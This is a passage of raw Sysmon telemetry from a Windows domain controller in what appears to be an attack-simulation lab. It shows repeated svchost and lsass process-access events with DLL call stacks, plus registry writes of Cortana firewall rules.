13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.414{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.336{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.336{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.977{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.977{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.977{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.977{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.977{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.977{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.977{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.977{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{90B42FC2-2534-4BA0-9A53-F71BF8AB4F92}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Platform=2:6:2|Platform2=GTEQ|Edge=TRUE| 13241300x800000000000000010703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.977{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{ABF01AB1-8776-45B9-92C1-38DDD03E5D79}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x800000000000000010702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 